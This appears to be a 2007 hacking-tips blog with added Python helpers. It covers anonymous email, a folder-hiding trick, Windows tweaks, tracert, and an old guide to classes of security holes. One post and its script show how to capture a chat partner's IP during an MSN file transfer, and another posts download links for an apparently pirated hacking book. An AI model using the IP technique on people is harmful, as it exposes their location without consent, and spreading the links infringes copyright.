


Anonymous Email and Remailer Services
12 March 2007

Anonymous e-mail services are what you want when the recipient of a message should not be able to find out who sent it.

The best, most secure and least traceable way to send an e-mail anonymously is still to use a remailer chain by hand. If you do not require absolute anonymity, though, here are a few services that let you send anonymous e-mails easily through a web interface. Keep in mind what "anonymous" means for each of them: a web front-end is a single party that sees your IP address (and, if it supports replies, your mailbox), so it can be asked or compelled to reveal you even when the recipient sees nothing.

AdviceBox: Advicebox lets you send anonymous e-mails easily (your identity will be known to Advicebox, but not revealed to the recipient) and lets you receive replies via a web interface, too.

AnonymousSpeech: according to the service, mail sent via AnonymousSpeech contains no traces to the sender, and you can even receive replies.

Try these out and leave a comment.

 
posted by VaTsAl at 7:14 am | Permalink 0 comments
Locking Drives without any software
25 February 2007

Suppose you want to lock the folder movies on drive D:, i.e. the path D:\movies. In D:\ create a text file and type

ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}

Now save this text file as loc.bat.

Create another text file and type in it

ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies

Now save this text file as key.bat. Mind the space before the final "movies": without it ren gets a single argument and fails with a syntax error.

Now you have two batch files, loc and key, next to the folder (they must stay in D:\, because ren is given relative names). Double-click loc and in Explorer the movies folder turns into the Control Panel: opening it shows Control Panel applets instead of your files. Double-click key and you get your original folder back.

Check it out!

What actually happens, and why this is not a lock: the suffix is the CLSID of the Control Panel shell folder, and Explorer renders any folder named "something.{CLSID}" as that shell object. On disk it is still an ordinary directory with your files in it and with unchanged permissions. From a command prompt, "dir movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}" lists the contents, "copy" takes them out, and anyone who finds key.bat lying next to the folder can undo the trick in one click. Use it to hide a folder from casual browsing; to keep other users out, set NTFS permissions on the folder or use EFS.

 
posted by VaTsAl at 9:08 pm | Permalink 0 comments
Increase Hard disk speed
18 February 2007

To speed up hard disk access, this tip configures a special buffer in memory for handling the interrupts raised by the disk controller (IRQ 14 is the primary IDE channel).
It applies to Windows 95/98/ME only: SYSEDIT and the [386Enh] section of system.ini configure the virtual device drivers of those versions. Windows NT/2000/XP keep system.ini only for legacy applications, and their disk stack ignores [386Enh], so the line does nothing there.
This tip is only recommended if you have 256MB RAM or more.
Follow these steps:

Run SYSEDIT.EXE from the Run command.

Expand the system.ini file window.

Scroll down almost to the end of the file till you find the section header [386Enh].

Press Enter to make one blank line below it, and in that line type

Irq14=4096

Note: keep the spelling exactly as shown.

Click on the File menu, then choose Save.

Close SYSEDIT and reboot your computer.

Done. Any improvement shows after the reboot. Benchmark a large file copy before and after rather than trusting the feel of it: this setting is a widely circulated tip rather than a documented option, and reports of its effect are anecdotal.

 
posted by VaTsAl at 8:46 pm | Permalink 0 comments
Increasing options in add/remove programs:

Not a fan of MSN Messenger? Don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's built-in programs are visible in the Windows Components list. It is fairly easy to change, though: open the file X:\Windows\inf\sysoc.inf (where X: is the drive Windows XP is installed on) in Notepad, from an administrator account since ordinary users cannot write to the inf directory. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is the list of components the Optional Component Manager knows about. Each line has the form Name=DLL,entry point,INF file,flags,install order. Take MSN Messenger as the example: the entry called 'msmsgs', third from last. Its flags field reads 'hide', and that word is what tells Windows not to display the component in the Windows Components list. Fix this up by simply deleting the word 'hide', changing this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Windows Components list of Add/Remove Programs. If you want to view and remove all hidden components, open sysoc.inf and delete the word 'hide' from the flags field of every line in [Components]. A global find and replace of ",hide" with a single comma "," does the same thing, but only if nothing else in the file contains that string, so back the file up first and check the result.
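The per-field version of the edit, as an added example rather than anything from the original post: it walks only the [Components] section of sysoc.inf, splits each entry into its DLL, entry point, INF, flags and order fields, and blanks the flags field when it is "hide". SAMPLE_SYSOC is a constructed excerpt in the layout shown above; the file path argument and the ".unhidden" output name are this example's own choices.

```python
"""Un-hide Windows XP optional components in sysoc.inf.

Added example, not from the original post: it parses the [Components]
section field by field instead of doing a blind ",hide" find-and-replace,
so only the flags field of component lines is touched. SAMPLE_SYSOC is a
constructed excerpt in the layout the post shows.
"""
from typing import List, Optional, Set, Tuple

SAMPLE_SYSOC = """\
[Version]
Signature = "$Windows NT$"

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

[Global]
WindowTitle=%WindowTitle%
"""


def split_component(line: str) -> Optional[Tuple[str, List[str]]]:
    """(name, fields) for a Name=dll,entry,inf,flags,order line, else None."""
    if "=" not in line or line.lstrip().startswith(";"):
        return None
    name, _, value = line.partition("=")
    return name.strip(), [f.strip() for f in value.split(",")]


def _is_hidden(fields: List[str]) -> bool:
    # The flags field sits just before the trailing install-order number;
    # a bare "hide" there keeps the entry out of Add/Remove Programs.
    return len(fields) >= 5 and fields[-2].lower() == "hide"


def hidden_components(text: str) -> List[str]:
    """Names of components whose flags field is 'hide'."""
    names, section = [], None
    for raw in text.splitlines():
        stripped = raw.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            section = stripped[1:-1].lower()
            continue
        parsed = split_component(raw) if section == "components" else None
        if parsed and _is_hidden(parsed[1]):
            names.append(parsed[0])
    return names


def unhide_components(text: str, only: Optional[Set[str]] = None) -> Tuple[str, List[str]]:
    """Blank the 'hide' flag on component lines (all, or just those in `only`).
    Lines outside [Components], comments and unrelated fields are left alone."""
    out, changed, section = [], [], None
    for raw in text.splitlines():
        stripped = raw.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            section = stripped[1:-1].lower()
            out.append(raw)
            continue
        parsed = split_component(raw) if section == "components" else None
        if parsed and _is_hidden(parsed[1]) and (only is None or parsed[0] in only):
            name, fields = parsed
            fields[-2] = ""
            changed.append(name)
            out.append(f"{name}={','.join(fields)}")
        else:
            out.append(raw)
    new_text = "\n".join(out) + ("\n" if text.endswith("\n") else "")
    return new_text, changed


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # e.g. C:\Windows\inf\sysoc.inf
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            src = fh.read()
    else:
        src = SAMPLE_SYSOC
    print("hidden now:", hidden_components(src))
    new_text, names = unhide_components(src)
    print("un-hidden:", names)
    if len(sys.argv) > 1:
        # Written next to the original; copy it over sysoc.inf yourself after a backup.
        with open(sys.argv[1] + ".unhidden", "w") as fh:
            fh.write(new_text)
```

Run it with no argument to see the effect on the sample, or with the path of your sysoc.inf to get a ".unhidden" copy beside it. Passing only={"msmsgs"} un-hides just that component.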

 
posted by VaTsAl at 8:45 pm | Permalink 0 comments





http://rapidshare.de/files/37379997/Hacking_Windows_XP__Jul_2004_.rar

or

http://www.megaupload.com/?d=XYTFQCIN

Password: a paulmann posting

 
posted by VaTsAl at 8:40 pm | Permalink 0 comments
part 2 of msn messenger hacking
14 February 2007

Well, 50% of the work is done now. You know how to get the IP of a remote system, so it's time to trace it and find some details about the IP.

Tracing an IP is quite simple. You can do it the easy way with GUI tools like Visual Trace 6.0b
[ftp://ftp.visualware.com/pub/vr/vr.exe]
or Neotrace
[http://www.neoworx.com/download/NTX325.exe]
or our way, using the tracert command from a DOS prompt.
I suggest you use DOS and its tracert tool, because it gives you a clear idea of how an IP is traced and you will know how things work: how the route is discovered and which networks the packets cross along the way. (What tracert does is send packets with an increasing time-to-live, so that each router in turn expires one and sends back an ICMP "time exceeded" message from its own address; that is where the list of hops comes from.)

Let's take a look at the tracert tool that Microsoft ships with DOS and Windows.
It is a very handy tool for anyone who needs to trace an IP.
Open a DOS window and type tracert.

C:\windows>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.
You now see a description of the tracert command and its switches.
These switches do not make much difference for our purpose. You can increase the timeout in milliseconds with the -w switch if you are on a slow connection, and use -d if you do not want addresses resolved to hostnames (which also makes the trace faster).
By default tracert traces a maximum of 30 hops. With the -h switch you can change that limit.
Now it's time for execution.
Let's trace the IP of yahoo.com [216.115.108.243]

TIP: After enough experience you can guess some things from the IP alone. For example, the IP 203.90.68.8 belonged to an Indian network; at the time, Indian IPs generally began with 203 or 202. That is only a rough rule of thumb for the APNIC ranges, though; a whois lookup against the regional registry (APNIC, ARIN, RIPE) is the reliable way to find out who an address is allocated to.

C:\WINDOWS>tracert yahoo.com

Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:

1 308 ms 142 ms 127 ms 203.94.246.35
2 140 ms 135 ms * 203.94.246.1
3 213 ms 134 ms 132 ms 203.94.255.33
4 134 ms 130 ms 129 ms 203.200.64.29
5 122 ms 135 ms 131 ms 203.200.87.75
6 141 ms 137 ms 121 ms 203.200.87.15
7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]
8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]
9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]
10 * * * Request timed out.
11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]
12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]
13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]
14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]
15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]
16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]
Trace complete.

Note: Here I traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace; the result will be the same, except that a name can resolve to a different address than the one shown here.

Looking carefully at the results you can figure out a lot about yahoo's server [216.115.108.243].
The first packets leave my ISP at 203.94.246.35. Similarly you can find the different routers through which packets travel to and from the target system. Look at hop 13: the router is ix-5-0.core1.PaloAlto.Teleglobe.net, from which you can easily figure out that it sits in Palo Alto. Also note the jump from about 150 ms at hop 7 (VSNL, Delhi) to about 570 ms at hop 8 (Teleglobe, New York): that is the intercontinental link, and latency jumps like this tell you where the long hauls are even when the hostnames do not. Finally look at the last router before the target, vl20.bas1.snv.yahoo.com, and the target itself, yahoo.com [216.115.108.243]. Put that address into a whois lookup (and a reverse DNS lookup) and you get most of the information available about it, such as the organisation it is allocated to and where that organisation is.
Another thing tracert tells you is how many hops (routers) away the target is. In the case of yahoo.com the target is hop 16, so there are 15 routers between my system and yahoo's server (the 16th hop is the server itself). Hop 10 did not answer within the timeout, which is common for routers that rate-limit or drop ICMP; it does not mean the path is broken.

Apart from tracing an IP you can find out many useful details about the path to the target system using the tracert tool.
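Reading a trace by eye, as above, does not scale past a few of them. The following is an added example, not part of the original post, that parses Windows tracert output into hops and computes the things the text reads off manually: the router count, the hops that stayed silent, the networks crossed, and the latency jumps that mark the long-haul links. SAMPLE_TRACE is the trace printed in the post; the 200 ms jump threshold and the domain-shortening rule are this example's own assumptions.

```python
"""Parse Windows tracert output and pull out what the post reads by eye.

Added example, not part of the original post. SAMPLE_TRACE is the trace
printed in the post; the parsing rules and the 200 ms jump threshold are
this example's own choices.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SAMPLE_TRACE = """\
Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:

  1   308 ms   142 ms   127 ms  203.94.246.35
  2   140 ms   135 ms     *     203.94.246.1
  3   213 ms   134 ms   132 ms  203.94.255.33
  4   134 ms   130 ms   129 ms  203.200.64.29
  5   122 ms   135 ms   131 ms  203.200.87.75
  6   141 ms   137 ms   121 ms  203.200.87.15
  7   143 ms   170 ms   154 ms  vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]
  8   565 ms   589 ms   568 ms  if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]
  9   596 ms   584 ms   600 ms  if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]
 10     *        *        *     Request timed out.
 11   703 ms   701 ms   719 ms  if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]
 12   694 ms   683 ms   681 ms  if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]
 13   656 ms   677 ms   700 ms  ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]
 14   667 ms   673 ms   673 ms  ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]
 15   653 ms   673 ms   673 ms  vl20.bas1.snv.yahoo.com [216.115.100.225]
 16   666 ms   676 ms   674 ms  yahoo.com [216.115.108.243]

Trace complete.
"""

HOP_RE = re.compile(r"^\s*(\d+)\s+((?:(?:<?\d+ ms|\*)\s+){3})(.*?)\s*$")
RTT_RE = re.compile(r"<?(\d+) ms|(\*)")
NAME_IP_RE = re.compile(r"^(\S+)\s+\[([\d.]+)\]$")
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class Hop:
    number: int
    rtts: List[Optional[int]]   # None where tracert printed '*'
    host: Optional[str]         # resolved name, if any
    ip: Optional[str]           # None when the hop never answered

    @property
    def avg_rtt(self) -> Optional[float]:
        good = [r for r in self.rtts if r is not None]
        return sum(good) / len(good) if good else None


def parse_tracert(text: str) -> List[Hop]:
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue                   # banner, blank and "Trace complete." lines
        rtts = [int(n) if n else None for n, _ in RTT_RE.findall(m.group(2))]
        rest, host, ip = m.group(3), None, None
        nm = NAME_IP_RE.match(rest)
        if nm:
            host, ip = nm.group(1), nm.group(2)
        elif IP_RE.match(rest):
            ip = rest                  # tracert -d, or no reverse DNS entry
        hops.append(Hop(int(m.group(1)), rtts, host, ip))
    return hops


def router_count(hops: List[Hop]) -> int:
    """Routers between us and the target: the last hop is the target itself."""
    return len(hops) - 1


def timed_out(hops: List[Hop]) -> List[int]:
    return [h.number for h in hops if h.ip is None]


def latency_jumps(hops: List[Hop], threshold_ms: float = 200) -> List[Tuple[int, int, int]]:
    """(from_hop, to_hop, delta_ms) wherever the average RTT rises by at least
    threshold_ms between consecutive answering hops: the long-haul links."""
    jumps, prev = [], None
    for h in hops:
        if h.avg_rtt is None:
            continue                   # a silent hop does not reset the comparison
        if prev is not None and h.avg_rtt - prev.avg_rtt >= threshold_ms:
            jumps.append((prev.number, h.number, round(h.avg_rtt - prev.avg_rtt)))
        prev = h
    return jumps


def transit_networks(hops: List[Hop]) -> List[str]:
    """Ordered, de-duplicated registrable domains of the resolved hops."""
    nets = []
    for h in hops:
        if not h.host or "." not in h.host:
            continue
        labels = h.host.lower().split(".")
        # two-letter country TLD under a generic second level keeps three labels
        keep = 3 if len(labels[-1]) == 2 and labels[-2] in {"net", "com", "co", "org", "ac", "gov"} else 2
        dom = ".".join(labels[-keep:])
        if dom not in nets:
            nets.append(dom)
    return nets


if __name__ == "__main__":
    hops = parse_tracert(SAMPLE_TRACE)
    print(f"{router_count(hops)} routers, silent hops: {timed_out(hops)}")
    print("latency jumps:", latency_jumps(hops))
    print("networks crossed:", transit_networks(hops))
```

Feed it the output of "tracert -d" and the host column is simply empty; the RTT analysis still works, which is the point of -d when name resolution is slow.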

 
posted by VaTsAl at 7:22 pm | Permalink 0 comments
How to get the IP of a remote system while chatting through msn messenger

This is a tutorial on how to get an IP address from MSN Messenger. It is actually a really easy thing to do; it is not a matter of reverse engineering MSN Messenger, as many people think.
The IP address is only exposed when you send or accept a file through MSN Messenger. When you send instant messages, the message goes through Microsoft's servers, which hides the other person's IP and yours. But when you send or receive a file, it is a direct connection between the two computers.
To obtain the IP, accept a file transfer from, or send a file to, the other person, and while the transfer is under way type "netstat" (without the quotation marks) at the DOS prompt. You should get a table like this:

Proto  Local Address  Foreign Address                      State
TCP    kick:1033      msgr-ns29.msgr.hotmail.com:1863      ESTABLISHED
TCP    kick:1040      msgr-sb36.msgr.hotmail.com:1863      ESTABLISHED
TCP    kick:xxxx      <the remote host>:xxxx               ESTABLISHED

The first entry is the notification server you are signed in to. There can be several of the second kind (the switchboard servers), because a new connection is made to the server for every conversation you have open. What you are looking for is the remaining ESTABLISHED entry whose foreign address is not a hotmail.com server: that is the remote host, and it will look something like "host63-7-102-226.ppp.cal.vsnl.com" or "203.64.90.6" (without the quotation marks).
All you need to do now is put that address into your IP lookup program to get the IP of the remote system; running "netstat -n" instead gives you the numeric address directly. Two caveats: take a netstat snapshot before and during the transfer and compare them, so you do not mistake a web or other connection for the peer; and if the other person is behind a NAT router, the address you see is that router's public address, not their PC's.
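The filtering described above, done by script instead of by eye, as an added example that is not part of the original post: it takes the text of netstat, keeps the ESTABLISHED TCP rows, throws away the Messenger servers, loopback and ordinary web or mail connections, and also supports the before/during comparison. Both connection tables are constructed to look like the one in the post; the 6891 port on the peer row is the range MSN Messenger used for direct file transfers and is part of the sample, not something the post states.

```python
"""Pick the file-transfer peer out of a netstat table.

Added example, not from the original post. The connection tables below are
constructed to look like the one in the post; the 6891 port is the range
MSN Messenger used for direct file transfers and is part of the sample.
"""
import re
from typing import List, NamedTuple, Set


class Peer(NamedTuple):
    local: str
    host: str
    port: int


MESSENGER_SERVER = re.compile(r"\.msgr\.hotmail\.com$", re.IGNORECASE)
MESSENGER_PORT = 1863                    # notification and switchboard servers
NOT_A_PEER_PORTS = {80, 443, 25, 110}    # web and mail traffic that may be open too

BEFORE_TRANSFER = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    kick:1033              msgr-ns29.msgr.hotmail.com:1863  ESTABLISHED
  TCP    kick:1040              msgr-sb36.msgr.hotmail.com:1863  ESTABLISHED
  TCP    kick:1051              www.example.com:80     ESTABLISHED
  TCP    kick:135               kick:0                 LISTENING
  UDP    kick:1900              *:*
"""

DURING_TRANSFER = BEFORE_TRANSFER + """\
  TCP    kick:1046              host63-7-102-226.ppp.cal.vsnl.com:6891  ESTABLISHED
"""


def established_tcp(netstat_text: str) -> List[Peer]:
    """Every ESTABLISHED TCP row as (local, remote host, remote port).
    Works on the 4-column Windows layout and the 6-column Linux one."""
    rows = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].upper().startswith("TCP") \
                or parts[-1].upper() != "ESTABLISHED":
            continue
        local, foreign = parts[-3], parts[-2]
        host, _, port = foreign.rpartition(":")      # rpartition survives IPv6 colons
        rows.append(Peer(local, host, int(port)))
    return rows


def candidate_peers(netstat_text: str) -> List[Peer]:
    """Drop the Messenger servers (they relay chat, they are not the other
    person), loopback, and ordinary web/mail connections."""
    peers = []
    for p in established_tcp(netstat_text):
        own_name = p.local.rpartition(":")[0]
        if MESSENGER_SERVER.search(p.host) or p.port == MESSENGER_PORT:
            continue
        if p.host in ("127.0.0.1", "localhost", "::1", own_name):
            continue
        if p.port in NOT_A_PEER_PORTS:
            continue
        peers.append(p)
    return peers


def new_connections(before: str, during: str) -> List[Peer]:
    """Connections that appeared once the transfer started: the surest way to
    tell the peer from anything else that happened to be open."""
    seen: Set[Peer] = set(established_tcp(before))
    return [p for p in established_tcp(during) if p not in seen]


if __name__ == "__main__":
    import subprocess
    try:
        live = subprocess.run(["netstat", "-n"], capture_output=True,
                              text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        live = DURING_TRANSFER           # no netstat here: demonstrate on the sample
    for p in candidate_peers(live):
        print(f"possible peer: {p.host}:{p.port} (from {p.local})")
```

Run it twice, once before and once during the transfer, and hand both outputs to new_connections(); whatever appears only in the second snapshot is the other end of the file transfer.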

 
posted by VaTsAl at 11:13 am | Permalink 0 comments
How to find security holes
13 February 2007

1) Physical Security Holes.

- Where the potential problem is caused by giving unauthorised persons
physical access to the machine, where this might allow them to perform
things that they shouldn't be able to do.

A good example of this would be a public workstation room where it would
be trivial for a user to reboot a machine into single-user mode and muck
around with the workstation filestore, if precautions are not taken.

Another example of this is the need to restrict access to confidential
backup tapes, which may (otherwise) be read by any user with access to
the tapes and a tape drive, whether they are meant to have permission or
not.

2) Software Security Holes

- Where the problem is caused by badly written items of "privileged"
software (daemons, cronjobs) which can be compromised into doing things
which they shouldn't oughta.

The most famous example of this is the "sendmail debug" hole (see
bibliography) which would enable a cracker to bootstrap a "root" shell.
This could be used to delete your filestore, create a new account, copy
your password file, anything.

(Contrary to popular opinion, crack attacks via sendmail were not just
restricted to the infamous "Internet Worm" - any cracker could do this
by using "telnet" to port 25 on the target machine. The story behind a
similar hole (this time in the EMACS "move-mail" software) is described
in [Stoll].)

New holes like this appear all the time, and your best hopes are to:

a: try to structure your system so that as little software as possible
runs with root/daemon/bin privileges, and that which does is known to
be robust.

b: subscribe to a mailing list which can get details of problems
and/or fixes out to you as quickly as possible, and then ACT when you
receive information.

>From: Wes Morgan
>
> c: When installing/upgrading a given system, try to install/enable only
> those software packages for which you have an immediate or foreseeable
> need. Many packages include daemons or utilities which can reveal
> information to outsiders. For instance, AT&T System V Unix' accounting
> package includes acctcom(1), which will (by default) allow any user to
> review the daily accounting data for any other user. Many TCP/IP
> packages automatically install/run programs such as rwhod, fingerd, and
> tftpd, all of which can present security problems.
>
> Careful system administration is the solution. Most of these programs
> are initialized/started at boot time; you may wish to modify your boot
> scripts (usually in the /etc, /etc/rc, /etc/rcX.d directories) to
> prevent their execution. You may wish to remove some utilities completely.
> For some utilities, a simple chmod(1) can prevent access from unauthorized
> users.
>
> In summary, DON'T TRUST INSTALLATION SCRIPTS/PROGRAMS! Such facilities
> tend to install/run everything in the package without asking you. Most
> installation documentation includes lists of "the programs included in
> this package"; be sure to review it.

3) Incompatible Usage Security Holes

- Where, through lack of experience, or no fault of his/her own, the
System Manager assembles a combination of hardware and software which
when used as a system is seriously flawed from a security point of view.
It is the incompatibility of trying to do two unconnected but useful
things which creates the security hole.

Problems like this are a pain to find once a system is set up and
running, so it is better to build your system with them in mind. It's
never too late to have a rethink, though.

Some examples are detailed below; let's not go into them here, it would
only spoil the surprise.

4) Choosing a suitable security philosophy and maintaining it.

>From: Gene Spafford
>The fourth kind of security problem is one of perception and
>understanding. Perfect software, protected hardware, and compatible
>components don't work unless you have selected an appropriate security
>policy and turned on the parts of your system that enforce it. Having
>the best password mechanism in the world is worthless if your users
>think that their login name backwards is a good password! Security is
>relative to a policy (or set of policies) and the operation of a system
>in conformance with that policy.

---

From: Hacking
Subject: Hacking Ideas
Date: 11/10/93

( Please contribute by sending E-Mail to ... )

[ Many ideas taken from: HaxNet - APG V1.3 : Guide to finding new holes]

NOTE: I think this should be divided into general categories:
1) General principles
2) Looking for holes in src (most items here)
3) Looking in binary distributions
4) Looking in site specific configurations

The following general classifications suggest themselves:
1) SUID/SGID
2) Return codes/error conditions
3) unexpected input
4) race conditions
5) authentication
6) implicit trust
7) parameters
8) permissions
9) interrupts
10) I/O
11) symbolic links
12) Daemons, particularly those taking user input.
13) Kernel race conditions
14) what else? - please add categories

(Suggested splitting of above into main and sub-categories)
I: Suid binaries and scripts
unexpected user interactions
flawed library calls
implicit assumptions of external conditions (sym links, loc. paths)
race conditions
II: daemons running with privileged uid's
race conditions
poor file protections
implicit file protections
trust
authentication
III: Kernel problems
Kernel race conditions
device driver code

The following four step method was created by System Development
Corporation, who report a 65% success rate on the flaw hypotheses
generated. Doing a comprehensive search for operating system flaws
requires four steps:

Step 1) Knowledge of system control structure.
===============================================
To find security holes, and identifying design weaknesses it is
necessary to understand the system control structure, and layers.
One should be able to list the:
A) security objects: items to be protected. ie: a users file.
B) control objects: items that protect security objects. ie: a i-node
C) mutual objects : objects in both classes. ie: the password file
With such a list, it is possible to graphically represent a control
hierarchy and identify potential points of attack. Making flow charts
to give a visual breakdown of relationships definitely helps.
Reading the various users, operators, and administrators manuals should
provide this information.
(following para's should probably be moved to a "legal" section)
Reading and grepping source code should also prove valuable. For those
without a source licence, I would suggest we use LINUX, NET2, and BSD386
distributions in order to stay legal. At some future time we may be able
to form a working contract between someone or a company with legal access
to other distributions and members actively participating in this project.
It appears that extracts of proprietary code may be used for academic
study, so long as they are not reused in a commercial product - more
checking is necessary though.

Step 2) Generate an inventory of suspected flaws. (i.e. flaw hypotheses)
========================================================================
In particular we want:
Code history:
What UNIX src does a particular flavor derive from? This is important
for cross references (very often only one vendor patches certain code,
which may get reused, in its unpatched reincarnation, by others).
A solid cross reference:
Who checked which bug in what OS and what version prevents us from
duplicating work.

A good start would be listing all the suid binaries on the various OS
flavors/versions. Then try to work out why each program is suid. i.e.:
rcp is suid root because it must use a privileged port to do user
name authentication.
Often code that was never designed to be suid is made suid during
porting to solve file access problems.
We need to develop a database that will be able to look at pairs and
triplets of data, specifically: program name, suid, sgid, object accessed
(why prog is suid/sgid), OS flavor/version, and flavor/version genealogy.
Any suggestions on how to implement such a DB?
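A small, runnable version of that database, as an added example and not part of the original posting: it inventories every setuid/setgid regular file under a directory with owner, mode and a SHA-256 of the contents, and diffs the inventory against a baseline taken from a trusted install. That answers the later checks about suid programs that were added from the net (33) or replaced by a less secure build (34). The demo() scenario, its file names and contents are constructed.

```python
"""Inventory setuid/setgid files and diff them against a known-good baseline.

Added example, not part of the original posting. It is a small version of
the "which programs are suid, and are they the ones that shipped" database
the text asks for: record path, owner, mode and a SHA-256 of each
privileged file, then report additions, replacements and removals.
"""
import hashlib
import os
import stat
from typing import Dict, List, NamedTuple


class PrivFile(NamedTuple):
    path: str      # relative to the scanned root
    uid: int
    gid: int
    mode: str      # octal permission bits, e.g. "4755"
    sha256: str


def _digest(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def inventory(root: str) -> List[PrivFile]:
    """Regular files under root with the setuid or setgid bit set. Symlinks are
    not followed and not reported: the bit only matters on the target."""
    found = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    continue
                found.append(PrivFile(os.path.relpath(full, root), st.st_uid, st.st_gid,
                                      f"{stat.S_IMODE(st.st_mode):04o}", _digest(full)))
            except OSError:
                continue      # unreadable: a root-only file we cannot hash as a user
    return sorted(found)


def baseline_from(files: List[PrivFile]) -> Dict[str, str]:
    """path -> sha256, taken from a freshly installed, trusted system."""
    return {f.path: f.sha256 for f in files}


def compare(found: List[PrivFile], baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """unexpected: privileged but not in the baseline (items 33/35)
    replaced:   known path, different contents (item 34)
    missing:    in the baseline, no longer privileged or gone"""
    now = {f.path: f.sha256 for f in found}
    return {
        "unexpected": sorted(p for p in now if p not in baseline),
        "replaced": sorted(p for p in now if p in baseline and now[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in now),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: a fresh install with one setuid binary, after which
    an admin adds a setuid tool from the net and replaces passwd with a
    different build. Returns the comparison."""
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)

        def put(name: str, data: bytes, mode: int) -> None:
            p = os.path.join(bindir, name)
            with open(p, "wb") as fh:
                fh.write(data)
            os.chmod(p, mode)          # after the write: writing clears the suid bit

        put("passwd", b"vendor build", 0o4755)
        put("ls", b"not privileged", 0o755)
        baseline = baseline_from(inventory(root))          # taken at install time
        put("passwd", b"admin's rebuilt passwd", 0o4755)   # item 34
        put("nfswatch", b"from the net", 0o4755)           # item 33
        return compare(inventory(root), baseline)


if __name__ == "__main__":
    import sys
    for f in inventory(sys.argv[1] if len(sys.argv) > 1 else "/usr"):
        print(f.mode, f.uid, f.gid, f.sha256[:12], f.path)
```

Keep the baseline off the machine it describes, otherwise whoever replaced passwd can update the baseline as well.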

Step 3) Confirm hypotheses. (test and exploit flaws)
====================================================

Step 4) Make generalizations of the underlying system weaknesses, for
which the flaw represents a specific instance.
=====================================================================

Tool Box:
=========
AGREP: I suggest everyone obtain, and install agrep from:
